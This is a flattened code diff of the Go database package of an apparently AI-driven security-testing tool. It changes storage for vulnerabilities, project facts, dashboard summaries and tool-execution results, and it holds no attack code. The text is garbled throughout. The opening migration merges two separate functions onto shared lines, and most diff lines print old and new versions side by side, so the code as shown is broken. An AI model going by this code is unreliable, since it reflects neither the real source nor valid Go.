ddl := ` _, err := db.Exec(`DROP TABLE IF EXISTS project_fact_versions`)
CREATE TABLE IF NOT EXISTS project_fact_versions ( return err
id TEXT PRIMARY KEY, }
fact_id TEXT NOT NULL,
project_id TEXT NOT NULL, // migrateVulnerabilitiesConversationFK 将 vulnerabilities.conversation_id 外键改为 ON DELETE SET NULL,删除对话时保留漏洞记录。
fact_key TEXT NOT NULL, func (db *DB) migrateVulnerabilitiesConversationFK() error {
category TEXT NOT NULL DEFAULT 'note', ok, err := vulnerabilitiesConversationFKOnDeleteSetNull(db.DB)
summary TEXT NOT NULL DEFAULT '', if err != nil {
body TEXT,
confidence TEXT NOT NULL DEFAULT 'tentative',
source_conversation_id TEXT,
source_message_id TEXT,
pinned INTEGER NOT NULL DEFAULT 0,
related_vulnerability_id TEXT,
archived_at DATETIME NOT NULL,
FOREIGN KEY (fact_id) REFERENCES project_facts(id) ON DELETE CASCADE,
FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE CASCADE
);`
if _, err := db.Exec(ddl); err != nil {
return err return err
} }
_, _ = db.Exec(`CREATE INDEX IF NOT EXISTS idx_project_fact_versions_fact_id ON project_fact_versions(fact_id)`) if ok {
_, _ = db.Exec(`CREATE INDEX IF NOT EXISTS idx_project_facts_related_vuln ON project_facts(related_vulnerability_id)`) return nil
}
tx, err := db.Begin()
if err != nil {
return fmt.Errorf("开启事务失败: %w", err)
}
defer func() { _ = tx.Rollback() }()
const createNew = `
CREATE TABLE vulnerabilities_new (
id TEXT PRIMARY KEY,
conversation_id TEXT,
conversation_tag TEXT,
task_tag TEXT,
title TEXT NOT NULL,
description TEXT,
severity TEXT NOT NULL,
status TEXT NOT NULL DEFAULT 'open',
vulnerability_type TEXT,
target TEXT,
proof TEXT,
impact TEXT,
recommendation TEXT,
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
project_id TEXT,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL
);`
if _, err := tx.Exec(createNew); err != nil {
return fmt.Errorf("创建 vulnerabilities_new 失败: %w", err)
}
const copyRows = `
INSERT INTO vulnerabilities_new (
id, conversation_id, conversation_tag, task_tag, title, description,
severity, status, vulnerability_type, target, proof, impact, recommendation,
created_at, updated_at, project_id
)
SELECT
id, conversation_id, conversation_tag, task_tag, title, description,
severity, status, vulnerability_type, target, proof, impact, recommendation,
created_at, updated_at, project_id
FROM vulnerabilities;`
if _, err := tx.Exec(copyRows); err != nil {
return fmt.Errorf("复制 vulnerabilities 数据失败: %w", err)
}
if _, err := tx.Exec(`DROP TABLE vulnerabilities`); err != nil {
return fmt.Errorf("删除旧 vulnerabilities 表失败: %w", err)
}
if _, err := tx.Exec(`ALTER TABLE vulnerabilities_new RENAME TO vulnerabilities`); err != nil {
return fmt.Errorf("重命名 vulnerabilities 表失败: %w", err)
}
indexes := []string{
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_id ON vulnerabilities(conversation_id)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_tag ON vulnerabilities(conversation_tag)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_task_tag ON vulnerabilities(task_tag)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_severity ON vulnerabilities(severity)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_status ON vulnerabilities(status)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_created_at ON vulnerabilities(created_at)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id)`,
}
for _, stmt := range indexes {
if _, err := tx.Exec(stmt); err != nil {
return fmt.Errorf("重建 vulnerabilities 索引失败: %w", err)
}
}
if err := tx.Commit(); err != nil {
return fmt.Errorf("提交 vulnerabilities 外键迁移失败: %w", err)
}
db.logger.Info("vulnerabilities 表已迁移:删除对话时保留漏洞记录")
return nil return nil
} }
func vulnerabilitiesConversationFKOnDeleteSetNull(db *sql.DB) (bool, error) {
rows, err := db.Query(`PRAGMA foreign_key_list(vulnerabilities)`)
if err != nil {
return false, err
}
defer rows.Close()
found := false
for rows.Next() {
var id, seq int
var table, from, to, onUpdate, onDelete, match string
if err := rows.Scan(&id, &seq, &table, &from, &to, &onUpdate, &onDelete, &match); err != nil {
return false, err
}
if from == "conversation_id" {
found = true
if !strings.EqualFold(onDelete, "SET NULL") {
return false, nil
}
}
}
if err := rows.Err(); err != nil {
return false, err
}
return found, nil
}
// migrateVulnerabilitiesTable 迁移 vulnerabilities 表,补充标签字段 // migrateVulnerabilitiesTable 迁移 vulnerabilities 表,补充标签字段
func (db *DB) migrateVulnerabilitiesTable() error { func (db *DB) migrateVulnerabilitiesTable() error {
columns := []struct { columns := []struct {
+17
View File
@@ -72,6 +72,23 @@ func (db *DB) SaveToolExecution(exec *mcp.ToolExecution) error {
return nil return nil
} }
// UpdateToolExecutionResult 仅更新结果字段(用于 reduction 后将监控展示与模型上下文对齐)。
func (db *DB) UpdateToolExecutionResult(id string, result *mcp.ToolResult) error {
id = strings.TrimSpace(id)
if id == "" || result == nil {
return nil
}
resultBytes, err := json.Marshal(result)
if err != nil {
return err
}
_, err = db.Exec(`UPDATE tool_executions SET result = ? WHERE id = ?`, string(resultBytes), id)
if err != nil {
db.logger.Warn("更新工具执行结果失败", zap.Error(err), zap.String("executionId", id))
}
return err
}
// CountToolExecutions 统计工具执行记录总数 // CountToolExecutions 统计工具执行记录总数
func (db *DB) CountToolExecutions(status, toolName string) (int, error) { func (db *DB) CountToolExecutions(status, toolName string) (int, error) {
query := `SELECT COUNT(*) FROM tool_executions` query := `SELECT COUNT(*) FROM tool_executions`
+38 -23
View File
@@ -51,7 +51,6 @@ type ProjectFact struct {
SourceConversationID string `json:"source_conversation_id,omitempty"` SourceConversationID string `json:"source_conversation_id,omitempty"`
SourceMessageID string `json:"source_message_id,omitempty"` SourceMessageID string `json:"source_message_id,omitempty"`
Pinned bool `json:"pinned"` Pinned bool `json:"pinned"`
SupersedesFactID string `json:"supersedes_fact_id,omitempty"`
RelatedVulnerabilityID string `json:"related_vulnerability_id,omitempty"` RelatedVulnerabilityID string `json:"related_vulnerability_id,omitempty"`
CreatedAt time.Time `json:"created_at"` CreatedAt time.Time `json:"created_at"`
UpdatedAt time.Time `json:"updated_at"` UpdatedAt time.Time `json:"updated_at"`
@@ -112,10 +111,30 @@ func (db *DB) GetProject(id string) (*Project, error) {
return &p, nil return &p, nil
} }
// CountProjects 统计项目数量。
func (db *DB) CountProjects(status, search string) (int, error) {
query := `SELECT COUNT(*) FROM projects WHERE 1=1`
args := []interface{}{}
if s := strings.TrimSpace(status); s != "" {
query += " AND status = ?"
args = append(args, s)
}
if q := strings.TrimSpace(search); q != "" {
pattern := "%" + q + "%"
query += " AND (name LIKE ? OR COALESCE(description,'') LIKE ?)"
args = append(args, pattern, pattern)
}
var count int
if err := db.QueryRow(query, args...).Scan(&count); err != nil {
return 0, fmt.Errorf("统计项目失败: %w", err)
}
return count, nil
}
// ListProjects 列出项目。 // ListProjects 列出项目。
func (db *DB) ListProjects(status string, limit, offset int) ([]*Project, error) { func (db *DB) ListProjects(status, search string, limit, offset int) ([]*Project, error) {
if limit <= 0 { if limit <= 0 {
limit = 200 limit = 50
} }
query := `SELECT id, name, COALESCE(description,''), COALESCE(scope_json,''), status, pinned, created_at, updated_at query := `SELECT id, name, COALESCE(description,''), COALESCE(scope_json,''), status, pinned, created_at, updated_at
FROM projects WHERE 1=1` FROM projects WHERE 1=1`
@@ -124,6 +143,11 @@ func (db *DB) ListProjects(status string, limit, offset int) ([]*Project, error)
query += " AND status = ?" query += " AND status = ?"
args = append(args, s) args = append(args, s)
} }
if q := strings.TrimSpace(search); q != "" {
pattern := "%" + q + "%"
query += " AND (name LIKE ? OR COALESCE(description,'') LIKE ?)"
args = append(args, pattern, pattern)
}
query += " ORDER BY pinned DESC, updated_at DESC LIMIT ? OFFSET ?" query += " ORDER BY pinned DESC, updated_at DESC LIMIT ? OFFSET ?"
args = append(args, limit, offset) args = append(args, limit, offset)
@@ -215,7 +239,7 @@ func (db *DB) SetConversationProjectID(conversationID, projectID string) error {
func (db *DB) ListProjectFactsForIndex(projectID string, includeDeprecated bool) ([]*ProjectFact, error) { func (db *DB) ListProjectFactsForIndex(projectID string, includeDeprecated bool) ([]*ProjectFact, error) {
query := `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence, query := `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned, COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
COALESCE(supersedes_fact_id,''), COALESCE(related_vulnerability_id,''), created_at, updated_at COALESCE(related_vulnerability_id,''), created_at, updated_at
FROM project_facts WHERE project_id = ?` FROM project_facts WHERE project_id = ?`
args := []interface{}{projectID} args := []interface{}{projectID}
if !includeDeprecated { if !includeDeprecated {
@@ -237,7 +261,7 @@ func (db *DB) ListProjectFacts(projectID string, filter ProjectFactListFilter, l
} }
query := `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence, query := `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned, COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
COALESCE(supersedes_fact_id,''), COALESCE(related_vulnerability_id,''), created_at, updated_at COALESCE(related_vulnerability_id,''), created_at, updated_at
FROM project_facts WHERE project_id = ?` FROM project_facts WHERE project_id = ?`
args := []interface{}{projectID} args := []interface{}{projectID}
if c := strings.TrimSpace(filter.Category); c != "" { if c := strings.TrimSpace(filter.Category); c != "" {
@@ -276,7 +300,7 @@ func (db *DB) GetProjectFactByKey(projectID, factKey string) (*ProjectFact, erro
row := db.QueryRow( row := db.QueryRow(
`SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence, `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned, COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
COALESCE(supersedes_fact_id,''), COALESCE(related_vulnerability_id,''), created_at, updated_at COALESCE(related_vulnerability_id,''), created_at, updated_at
FROM project_facts WHERE project_id = ? AND fact_key = ?`, FROM project_facts WHERE project_id = ? AND fact_key = ?`,
projectID, factKey, projectID, factKey,
) )
@@ -288,7 +312,7 @@ func (db *DB) GetProjectFact(id string) (*ProjectFact, error) {
row := db.QueryRow( row := db.QueryRow(
`SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence, `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned, COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
COALESCE(supersedes_fact_id,''), COALESCE(related_vulnerability_id,''), created_at, updated_at COALESCE(related_vulnerability_id,''), created_at, updated_at
FROM project_facts WHERE id = ?`, id, FROM project_facts WHERE id = ?`, id,
) )
return scanProjectFactRow(row) return scanProjectFactRow(row)
@@ -327,24 +351,15 @@ func (db *DB) UpsertProjectFact(f *ProjectFact) (*ProjectFact, error) {
if strings.TrimSpace(f.Confidence) == "" { if strings.TrimSpace(f.Confidence) == "" {
f.Confidence = existing.Confidence f.Confidence = existing.Confidence
} }
if projectFactContentChanged(existing, f) {
versionID, verr := db.InsertProjectFactVersion(existing)
if verr != nil {
return nil, verr
}
f.SupersedesFactID = versionID
} else if f.SupersedesFactID == "" {
f.SupersedesFactID = existing.SupersedesFactID
}
_, err = db.Exec( _, err = db.Exec(
`UPDATE project_facts SET category = ?, summary = ?, body = ?, confidence = ?, `UPDATE project_facts SET category = ?, summary = ?, body = ?, confidence = ?,
source_conversation_id = COALESCE(?, source_conversation_id), source_conversation_id = COALESCE(?, source_conversation_id),
source_message_id = COALESCE(?, source_message_id), source_message_id = COALESCE(?, source_message_id),
pinned = ?, supersedes_fact_id = ?, related_vulnerability_id = ?, updated_at = ? pinned = ?, related_vulnerability_id = ?, updated_at = ?
WHERE id = ?`, WHERE id = ?`,
f.Category, f.Summary, f.Body, f.Confidence, f.Category, f.Summary, f.Body, f.Confidence,
nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned), nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned),
nullIfEmpty(f.SupersedesFactID), nullIfEmpty(f.RelatedVulnerabilityID), f.UpdatedAt, f.ID, nullIfEmpty(f.RelatedVulnerabilityID), f.UpdatedAt, f.ID,
) )
if err != nil { if err != nil {
return nil, fmt.Errorf("更新事实失败: %w", err) return nil, fmt.Errorf("更新事实失败: %w", err)
@@ -360,12 +375,12 @@ func (db *DB) UpsertProjectFact(f *ProjectFact) (*ProjectFact, error) {
_, err = db.Exec( _, err = db.Exec(
`INSERT INTO project_facts ( `INSERT INTO project_facts (
id, project_id, fact_key, category, summary, body, confidence, id, project_id, fact_key, category, summary, body, confidence,
source_conversation_id, source_message_id, pinned, supersedes_fact_id, related_vulnerability_id, source_conversation_id, source_message_id, pinned, related_vulnerability_id,
created_at, updated_at created_at, updated_at
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`, ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,
f.ID, f.ProjectID, f.FactKey, f.Category, f.Summary, f.Body, f.Confidence, f.ID, f.ProjectID, f.FactKey, f.Category, f.Summary, f.Body, f.Confidence,
nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned), nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned),
nullIfEmpty(f.SupersedesFactID), nullIfEmpty(f.RelatedVulnerabilityID), nullIfEmpty(f.RelatedVulnerabilityID),
f.CreatedAt, f.UpdatedAt, f.CreatedAt, f.UpdatedAt,
) )
if err != nil { if err != nil {
@@ -440,7 +455,7 @@ func scanProjectFactRow(row *sql.Row) (*ProjectFact, error) {
err := row.Scan( err := row.Scan(
&f.ID, &f.ProjectID, &f.FactKey, &f.Category, &f.Summary, &f.Body, &f.Confidence, &f.ID, &f.ProjectID, &f.FactKey, &f.Category, &f.Summary, &f.Body, &f.Confidence,
&f.SourceConversationID, &f.SourceMessageID, &pinned, &f.SourceConversationID, &f.SourceMessageID, &pinned,
&f.SupersedesFactID, &f.RelatedVulnerabilityID, &createdAt, &updatedAt, &f.RelatedVulnerabilityID, &createdAt, &updatedAt,
) )
if err != nil { if err != nil {
if err == sql.ErrNoRows { if err == sql.ErrNoRows {
@@ -461,7 +476,7 @@ func scanProjectFactFromRows(rows *sql.Rows) (*ProjectFact, error) {
err := rows.Scan( err := rows.Scan(
&f.ID, &f.ProjectID, &f.FactKey, &f.Category, &f.Summary, &f.Body, &f.Confidence, &f.ID, &f.ProjectID, &f.FactKey, &f.Category, &f.Summary, &f.Body, &f.Confidence,
&f.SourceConversationID, &f.SourceMessageID, &pinned, &f.SourceConversationID, &f.SourceMessageID, &pinned,
&f.SupersedesFactID, &f.RelatedVulnerabilityID, &createdAt, &updatedAt, &f.RelatedVulnerabilityID, &createdAt, &updatedAt,
) )
if err != nil { if err != nil {
return nil, err return nil, err
+91
View File
@@ -0,0 +1,91 @@
package database
import (
"fmt"
"strings"
"time"
)
// ProjectDashboardFact 仪表盘跨项目近期事实条目。
type ProjectDashboardFact struct {
ID string `json:"id"`
ProjectID string `json:"project_id"`
ProjectName string `json:"project_name"`
FactKey string `json:"fact_key"`
Category string `json:"category"`
Summary string `json:"summary"`
Confidence string `json:"confidence"`
Pinned bool `json:"pinned"`
UpdatedAt time.Time `json:"updated_at"`
}
// ProjectDashboardTotals 仪表盘项目事实汇总计数。
type ProjectDashboardTotals struct {
ActiveProjects int `json:"active_projects"`
TotalFacts int `json:"total_facts"`
}
// ProjectDashboardSummary 仪表盘项目情报摘要。
type ProjectDashboardSummary struct {
RecentFacts []ProjectDashboardFact `json:"recent_facts"`
Totals ProjectDashboardTotals `json:"totals"`
}
// GetProjectDashboardSummary 聚合跨项目近期事实(仅活跃项目、排除 deprecated)。
func (db *DB) GetProjectDashboardSummary(factLimit int) (*ProjectDashboardSummary, error) {
if factLimit <= 0 {
factLimit = 5
}
if factLimit > 50 {
factLimit = 50
}
out := &ProjectDashboardSummary{
RecentFacts: []ProjectDashboardFact{},
}
if err := db.QueryRow(`SELECT COUNT(*) FROM projects WHERE status = 'active'`).Scan(&out.Totals.ActiveProjects); err != nil {
return nil, fmt.Errorf("统计活跃项目失败: %w", err)
}
if err := db.QueryRow(
`SELECT COUNT(*) FROM project_facts f
INNER JOIN projects p ON p.id = f.project_id
WHERE f.confidence != 'deprecated' AND p.status = 'active'`,
).Scan(&out.Totals.TotalFacts); err != nil {
return nil, fmt.Errorf("统计事实失败: %w", err)
}
rows, err := db.Query(
`SELECT f.id, f.project_id, p.name, f.fact_key, f.category, f.summary, f.confidence, f.pinned, f.updated_at
FROM project_facts f
INNER JOIN projects p ON p.id = f.project_id
WHERE f.confidence != 'deprecated' AND p.status = 'active'
ORDER BY f.pinned DESC, f.updated_at DESC
LIMIT ?`,
factLimit,
)
if err != nil {
return nil, fmt.Errorf("查询近期事实失败: %w", err)
}
defer rows.Close()
for rows.Next() {
var item ProjectDashboardFact
var pinned int
var updatedAt string
if err := rows.Scan(
&item.ID, &item.ProjectID, &item.ProjectName, &item.FactKey,
&item.Category, &item.Summary, &item.Confidence, &pinned, &updatedAt,
); err != nil {
return nil, err
}
item.Pinned = pinned != 0
item.ProjectName = strings.TrimSpace(item.ProjectName)
item.UpdatedAt = parseDBTime(updatedAt)
out.RecentFacts = append(out.RecentFacts, item)
}
if err := rows.Err(); err != nil {
return nil, err
}
return out, nil
}
@@ -135,54 +135,6 @@ func TestRestoreProjectFact(t *testing.T) {
} }
} }
func TestUpsertProjectFact_createsVersionOnContentChange(t *testing.T) {
dbPath := filepath.Join(t.TempDir(), "facts.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatal(err)
}
defer db.Close()
proj, err := db.CreateProject(&Project{Name: "version-test"})
if err != nil {
t.Fatal(err)
}
created, err := db.UpsertProjectFact(&ProjectFact{
ProjectID: proj.ID,
FactKey: "finding/xss",
Category: "finding",
Summary: "v1",
Body: "body v1",
})
if err != nil {
t.Fatal(err)
}
if created.SupersedesFactID != "" {
t.Fatalf("expected no supersedes on create, got %q", created.SupersedesFactID)
}
updated, err := db.UpsertProjectFact(&ProjectFact{
ProjectID: proj.ID,
FactKey: "finding/xss",
Summary: "v2",
Body: "body v2",
})
if err != nil {
t.Fatal(err)
}
if updated.SupersedesFactID == "" {
t.Fatal("expected supersedes_fact_id after content change")
}
prev, err := db.GetProjectFactVersion(updated.SupersedesFactID)
if err != nil {
t.Fatal(err)
}
if prev.Summary != "v1" || prev.Body != "body v1" {
t.Fatalf("previous version mismatch: summary=%q body=%q", prev.Summary, prev.Body)
}
}
func TestMergeFactBodyOnUpdate(t *testing.T) { func TestMergeFactBodyOnUpdate(t *testing.T) {
if got := mergeFactBodyOnUpdate("", "keep"); got != "keep" { if got := mergeFactBodyOnUpdate("", "keep"); got != "keep" {
t.Fatalf("empty incoming: got %q", got) t.Fatalf("empty incoming: got %q", got)
-144
View File
@@ -1,144 +0,0 @@
package database
import (
"database/sql"
"fmt"
"strings"
"time"
"github.com/google/uuid"
)
// ProjectFactVersion 事实历史快照(同 fact_key 更新前归档)。
type ProjectFactVersion struct {
ID string `json:"id"`
FactID string `json:"fact_id"`
ProjectID string `json:"project_id"`
FactKey string `json:"fact_key"`
Category string `json:"category"`
Summary string `json:"summary"`
Body string `json:"body"`
Confidence string `json:"confidence"`
SourceConversationID string `json:"source_conversation_id,omitempty"`
SourceMessageID string `json:"source_message_id,omitempty"`
Pinned bool `json:"pinned"`
RelatedVulnerabilityID string `json:"related_vulnerability_id,omitempty"`
ArchivedAt time.Time `json:"archived_at"`
}
// InsertProjectFactVersion 将当前事实行快照写入版本表。
func (db *DB) InsertProjectFactVersion(f *ProjectFact) (string, error) {
if f == nil || f.ID == "" {
return "", fmt.Errorf("无效的事实记录")
}
id := uuid.New().String()
now := time.Now()
_, err := db.Exec(
`INSERT INTO project_fact_versions (
id, fact_id, project_id, fact_key, category, summary, body, confidence,
source_conversation_id, source_message_id, pinned, related_vulnerability_id, archived_at
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,
id, f.ID, f.ProjectID, f.FactKey, f.Category, f.Summary, f.Body, f.Confidence,
nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned),
nullIfEmpty(f.RelatedVulnerabilityID), now,
)
if err != nil {
return "", fmt.Errorf("归档事实版本失败: %w", err)
}
return id, nil
}
// GetProjectFactVersion 按版本 ID 获取快照。
func (db *DB) GetProjectFactVersion(versionID string) (*ProjectFactVersion, error) {
row := db.QueryRow(
`SELECT id, fact_id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
COALESCE(related_vulnerability_id,''), archived_at
FROM project_fact_versions WHERE id = ?`, versionID,
)
return scanProjectFactVersionRow(row)
}
// ListProjectFactVersions 列出某条事实的全部历史版本(新→旧)。
func (db *DB) ListProjectFactVersions(factID string, limit int) ([]*ProjectFactVersion, error) {
if limit <= 0 {
limit = 20
}
rows, err := db.Query(
`SELECT id, fact_id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
COALESCE(related_vulnerability_id,''), archived_at
FROM project_fact_versions WHERE fact_id = ? ORDER BY archived_at DESC LIMIT ?`,
factID, limit,
)
if err != nil {
return nil, err
}
defer rows.Close()
var out []*ProjectFactVersion
for rows.Next() {
v, err := scanProjectFactVersionFromRows(rows)
if err != nil {
return nil, err
}
out = append(out, v)
}
return out, rows.Err()
}
func projectFactContentChanged(existing, incoming *ProjectFact) bool {
if existing == nil || incoming == nil {
return false
}
mergedBody := mergeFactBodyOnUpdate(incoming.Body, existing.Body)
inCat := stringsTrimDefault(incoming.Category, existing.Category)
inConf := stringsTrimDefault(incoming.Confidence, existing.Confidence)
return existing.Summary != incoming.Summary ||
existing.Body != mergedBody ||
existing.Category != inCat ||
existing.Confidence != inConf
}
func stringsTrimDefault(s, fallback string) string {
if strings.TrimSpace(s) == "" {
return fallback
}
return strings.TrimSpace(s)
}
func scanProjectFactVersionRow(row *sql.Row) (*ProjectFactVersion, error) {
var v ProjectFactVersion
var pinned int
var archivedAt string
err := row.Scan(
&v.ID, &v.FactID, &v.ProjectID, &v.FactKey, &v.Category, &v.Summary, &v.Body, &v.Confidence,
&v.SourceConversationID, &v.SourceMessageID, &pinned,
&v.RelatedVulnerabilityID, &archivedAt,
)
if err != nil {
if err == sql.ErrNoRows {
return nil, fmt.Errorf("事实版本不存在")
}
return nil, err
}
v.Pinned = pinned != 0
v.ArchivedAt = parseDBTime(archivedAt)
return &v, nil
}
func scanProjectFactVersionFromRows(rows *sql.Rows) (*ProjectFactVersion, error) {
var v ProjectFactVersion
var pinned int
var archivedAt string
err := rows.Scan(
&v.ID, &v.FactID, &v.ProjectID, &v.FactKey, &v.Category, &v.Summary, &v.Body, &v.Confidence,
&v.SourceConversationID, &v.SourceMessageID, &pinned,
&v.RelatedVulnerabilityID, &archivedAt,
)
if err != nil {
return nil, err
}
v.Pinned = pinned != 0
v.ArchivedAt = parseDBTime(archivedAt)
return &v, nil
}
+1 -1
View File
@@ -37,7 +37,7 @@ func TestListProjectFacts_updatedAtJSON(t *testing.T) {
if err != nil { if err != nil {
t.Fatal(err) t.Fatal(err)
} }
projects, err := db.ListProjects("", 1, 0) projects, err := db.ListProjects("", "", 1, 0)
if err != nil || len(projects) == 0 { if err != nil || len(projects) == 0 {
t.Skip("no projects") t.Skip("no projects")
} }
+33
View File
@@ -0,0 +1,33 @@
package database
import (
"errors"
"strings"
"time"
)
// formatSQLiteUTC stores instants as UTC RFC3339 for consistent SQLite reads/writes.
func formatSQLiteUTC(t time.Time) string {
return t.UTC().Format(time.RFC3339Nano)
}
// sqliteEpochGE returns SQL comparing column to param as Unix seconds (timezone-safe).
func sqliteEpochGE(column, op string) string {
return "strftime('%s', " + column + ") " + op + " strftime('%s', ?)"
}
// ParseRFC3339Time parses API/query timestamps (RFC3339 or RFC3339Nano).
func ParseRFC3339Time(value string) (time.Time, error) {
value = strings.TrimSpace(value)
if value == "" {
return time.Time{}, errors.New("empty time value")
}
if t, err := time.Parse(time.RFC3339Nano, value); err == nil {
return t.UTC(), nil
}
t, err := time.Parse(time.RFC3339, value)
if err != nil {
return time.Time{}, err
}
return t.UTC(), nil
}
+5 -5
View File
@@ -98,7 +98,7 @@ type Vulnerability struct {
Title string `json:"title"` Title string `json:"title"`
Description string `json:"description"` Description string `json:"description"`
Severity string `json:"severity"` // critical, high, medium, low, info Severity string `json:"severity"` // critical, high, medium, low, info
Status string `json:"status"` // open, confirmed, fixed, false_positive Status string `json:"status"` // open, confirmed, fixed, false_positive, ignored
Type string `json:"type"` Type string `json:"type"`
Target string `json:"target"` Target string `json:"target"`
Proof string `json:"proof"` Proof string `json:"proof"`
@@ -138,7 +138,7 @@ func (db *DB) CreateVulnerability(vuln *Vulnerability) (*Vulnerability, error) {
_, err := db.Exec( _, err := db.Exec(
query, query,
vuln.ID, vuln.ConversationID, nullIfEmpty(vuln.ProjectID), vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description, vuln.ID, nullIfEmpty(vuln.ConversationID), nullIfEmpty(vuln.ProjectID), vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description,
vuln.Severity, vuln.Status, vuln.Type, vuln.Target, vuln.Severity, vuln.Status, vuln.Type, vuln.Target,
vuln.Proof, vuln.Impact, vuln.Recommendation, vuln.Proof, vuln.Impact, vuln.Recommendation,
vuln.CreatedAt, vuln.UpdatedAt, vuln.CreatedAt, vuln.UpdatedAt,
@@ -154,7 +154,7 @@ func (db *DB) CreateVulnerability(vuln *Vulnerability) (*Vulnerability, error) {
func (db *DB) GetVulnerability(id string) (*Vulnerability, error) { func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
var vuln Vulnerability var vuln Vulnerability
query := ` query := `
SELECT id, conversation_id, COALESCE(project_id,''), title, description, severity, status, SELECT id, COALESCE(conversation_id,''), COALESCE(project_id,''), title, description, severity, status,
conversation_tag, task_tag, vulnerability_type, target, proof, impact, recommendation, conversation_tag, task_tag, vulnerability_type, target, proof, impact, recommendation,
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id, COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id, COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
@@ -183,7 +183,7 @@ func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
// ListVulnerabilities 列出漏洞 // ListVulnerabilities 列出漏洞
func (db *DB) ListVulnerabilities(limit, offset int, filter VulnerabilityListFilter) ([]*Vulnerability, error) { func (db *DB) ListVulnerabilities(limit, offset int, filter VulnerabilityListFilter) ([]*Vulnerability, error) {
query := ` query := `
SELECT id, conversation_id, COALESCE(project_id,''), title, description, severity, status, conversation_tag, task_tag, SELECT id, COALESCE(conversation_id,''), COALESCE(project_id,''), title, description, severity, status, conversation_tag, task_tag,
vulnerability_type, target, proof, impact, recommendation, vulnerability_type, target, proof, impact, recommendation,
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id, COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id, COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
@@ -403,7 +403,7 @@ func (db *DB) GetVulnerabilityFilterOptions() (map[string][]string, error) {
if err != nil { if err != nil {
return nil, fmt.Errorf("查询漏洞ID建议失败: %w", err) return nil, fmt.Errorf("查询漏洞ID建议失败: %w", err)
} }
conversationIDs, err := collect(`SELECT DISTINCT conversation_id FROM vulnerabilities WHERE conversation_id <> '' ORDER BY created_at DESC LIMIT 500`) conversationIDs, err := collect(`SELECT DISTINCT conversation_id FROM vulnerabilities WHERE conversation_id IS NOT NULL AND conversation_id <> '' ORDER BY created_at DESC LIMIT 500`)
if err != nil { if err != nil {
return nil, fmt.Errorf("查询会话ID建议失败: %w", err) return nil, fmt.Errorf("查询会话ID建议失败: %w", err)
} }
+3 -2
View File
@@ -16,7 +16,8 @@ import (
) )
// ExecutionRecorder 可选,在 MCP 工具成功返回且带有 execution id 时回调(用于汇总 mcpExecutionIds)。 // ExecutionRecorder 可选,在 MCP 工具成功返回且带有 execution id 时回调(用于汇总 mcpExecutionIds)。
